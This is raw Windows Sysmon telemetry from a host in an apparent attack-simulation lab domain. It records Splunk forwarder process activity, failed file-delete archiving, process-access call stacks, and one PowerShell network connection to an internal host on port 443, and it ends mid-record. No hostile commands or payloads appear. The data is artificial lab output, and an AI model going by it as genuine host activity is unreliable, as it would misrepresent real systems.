23542300x800000000000000035084579Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:40.809{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1291FBAAAD892350E6C157746B7A3997,SHA256=F1578D0D389AC7B7B4A08ACE43CCF3B31B656E84172E10430C51C07E4791A180,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084581Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:41.840{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=051097F23733AF0468F9080F83409FBB,SHA256=FDE216AD4539BF20A6C9203F4EB088EB51EC940FFB0A8C8920E17003C45ED941,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084580Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:41.324{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D9ED9908D5C8E3E27DEBC9ABCEC7D712,SHA256=E2A7E7D73F4D41A42BA16BEB44A111BF5E56BF33C8BB5221E557702CEFA3E2FD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084584Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:07.112{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 
AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56628-false10.0.1.12-8000- 354300x800000000000000035084583Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:06.095{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56627-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084582Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:42.854{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DAD0EB546D08D0CD1BEF049F0DD3A70,SHA256=8A8942A6816C3F6CB3664BF6B1783EF175AA73E0CDAA704B017A3CE15C42FA00,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084594Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:43.875{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADF3FB202C8FF4FF60DAF9DA22536BFF,SHA256=601CE2767C5D6AAFBA06E3166A41415DBC9E630E1B6139DBCC0CC4E7AC8E346D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084593Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:43.722{B81B27B7-4E5F-613A-4090-03000000C801}67525864C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084592Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:43.554{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4E5F-613A-4090-03000000C801}6752C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084591Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:43.554{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084590Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:11:43.554{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084589Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:43.554{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084588Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:11:43.554{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084587Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:43.554{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4E5F-613A-4090-03000000C801}6752C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084586Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:43.554{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4E5F-613A-4090-03000000C801}6752C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084585Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:43.538{B81B27B7-4E5F-613A-4090-03000000C801}6752C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035084614Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:44.890{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FDADD29D04BD5EB4B3AAD6394D60748,SHA256=CA9B9D1C13C934C53B29F54A95702AEBE09C3E443FADB7EF2B042C0580547D27,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084613Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:11:44.821{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4E60-613A-4290-03000000C801}6948C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084612Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:44.821{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084611Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:11:44.821{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084610Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:44.821{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084609Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:11:44.821{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084608Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:44.821{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-4E60-613A-4290-03000000C801}6948C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084607Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:44.821{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4E60-613A-4290-03000000C801}6948C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084606Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:44.806{B81B27B7-4E60-613A-4290-03000000C801}6948C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035084605Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:44.721{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ACD1EE2F8ED87D22724B2ECC60328E11,SHA256=0610548FAB5665BAA6F5EB9AB054B5273B98E94F8347C9AE628E64ABFCF74584,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000035084604Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:44.721{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=01B17C850B8771045BCF25207E1113F4,SHA256=BD31CD9BD48157DB1619E657B0B47EE604BB72FEBF691A1C933A1EB37C615BB0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084603Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:44.374{B81B27B7-4E60-613A-4190-03000000C801}67121264C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084602Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:44.222{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4E60-613A-4190-03000000C801}6712C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000035084601Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:44.222{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084600Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:44.222{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084599Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:12:00.056{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084644Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:00.055{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035084674Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:01.791{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
